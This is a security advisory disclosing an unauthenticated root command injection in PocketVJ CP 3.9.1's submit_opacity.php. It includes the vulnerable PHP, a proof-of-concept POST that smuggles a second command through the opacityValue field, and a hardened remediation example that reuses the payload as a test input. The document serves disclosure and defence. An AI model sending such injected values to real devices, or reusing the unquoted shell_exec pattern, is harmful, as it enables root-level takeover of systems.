PocketVJ CP (PocketVJ-CP-v3) version 3.9.1 contains a critical unauthenticated remote code execution vulnerability in the submit_opacity.php component. The script interpolates the opacityValue POST parameter directly into a shell_exec() string that invokes /var/www/sync/dbuscontrol.sh through sudo, with no validation or quoting. Shell metacharacters in the parameter therefore terminate the intended setalpha command and append attacker-chosen commands, which run as root on the underlying system without any authentication.
Vulnerability Type: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Affected Products: PocketVJ CP (PocketVJ-CP-v3) versions 3.9.1 and earlier
CPE: cpe:2.3:a:pocketvj:pocketvj-cp:3.9.1:*:*:*:*:*:*:*
CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Description: The software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
- Remote Code Execution: TRUE
- Privilege Escalation: TRUE
- Denial of Service: TRUE
- Information Disclosure: TRUE
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
CVSS 4.0: 9.3 CRITICAL - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
CVSS 3.1: 9.8 CRITICAL - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Vulnerable Code (submit_opacity.php):
<?php
// Raw POST parameter is placed unquoted into a root-privileged shell command line.
$alphavalue = $_POST['opacityValue'];
shell_exec("sudo /var/www/sync/dbuscontrol.sh setalpha $alphavalue");
?>

Proof of Concept: the semicolons end the setalpha invocation and append id, whose output is written to /tmp/poc.txt on the device.
POST /submit_opacity.php HTTP/1.1
Host: [target]
Content-Type: application/x-www-form-urlencoded

opacityValue=100;id>/tmp/poc.txt;

Vendor Repository: https://github.com/magdesign/PocketVJ-CP-v3/releases/tag/release
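Remediation example. The following is added illustration, not PocketVJ's own code or a vendor patch: it places the vulnerable command construction from submit_opacity.php next to a hardened version that validates opacityValue as an integer and quotes it with escapeshellarg() before it reaches the shell. The accepted range 0-255 and the function names are assumptions for the example; the real bound is whatever dbuscontrol.sh setalpha accepts. The CLI demo only builds and prints the command strings, it never executes them.

```php
<?php
// Added example (not part of PocketVJ-CP-v3): vulnerable vs. hardened
// construction of the setalpha command. Range 0-255 is an assumption.

const DBUS_CONTROL = '/var/www/sync/dbuscontrol.sh';

// Vulnerable pattern, equivalent to the original submit_opacity.php:
// the raw POST value is interpolated into the command line unquoted.
function build_command_vulnerable(string $alphavalue): string
{
    return "sudo " . DBUS_CONTROL . " setalpha $alphavalue";
}

// Hardened: accept only an integer within the expected range, then quote
// the argument anyway so the shell can never reinterpret it. Returns null
// for anything else so the caller can answer 400 and log the attempt.
function build_command_hardened(string $alphavalue): ?string
{
    $alpha = filter_var(
        $alphavalue,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0, 'max_range' => 255]]
    );
    if ($alpha === false) {
        return null;
    }
    return "sudo " . DBUS_CONTROL . " setalpha " . escapeshellarg((string) $alpha);
}

// What the request handler should look like. Only meaningful under a web
// SAPI; the CLI demo below never calls it.
function handle_request(array $post): void
{
    $cmd = build_command_hardened($post['opacityValue'] ?? '');
    if ($cmd === null) {
        http_response_code(400);
        echo "invalid opacityValue\n";
        return;
    }
    shell_exec($cmd);
}

// CLI demo over constructed inputs, including the advisory's payload.
// Commands are printed, not run.
if (PHP_SAPI === 'cli') {
    $inputs = ['100', '100;id>/tmp/poc.txt;', '$(id)', '-1', '42abc'];
    foreach ($inputs as $in) {
        printf("input:      %s\n", $in);
        printf("vulnerable: %s\n", build_command_vulnerable($in));
        printf("hardened:   %s\n\n", build_command_hardened($in) ?? '(rejected)');
    }
}
```

Run with php on the command line to see that the PoC payload yields a command line containing a second command in the vulnerable form and is rejected outright in the hardened form. Validation is the primary control here; escapeshellarg() is defence in depth for the case where a future change widens what the parameter may contain. Note that the hardened handler still invokes the helper script as root through sudo, so the sudoers rule that permits it should be limited to that exact script and subcommand rather than a broad NOPASSWD grant.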
Reported By: Mamdouh Alrekabi (https://www.linkedin.com/in/mamdouh-alrekabi/)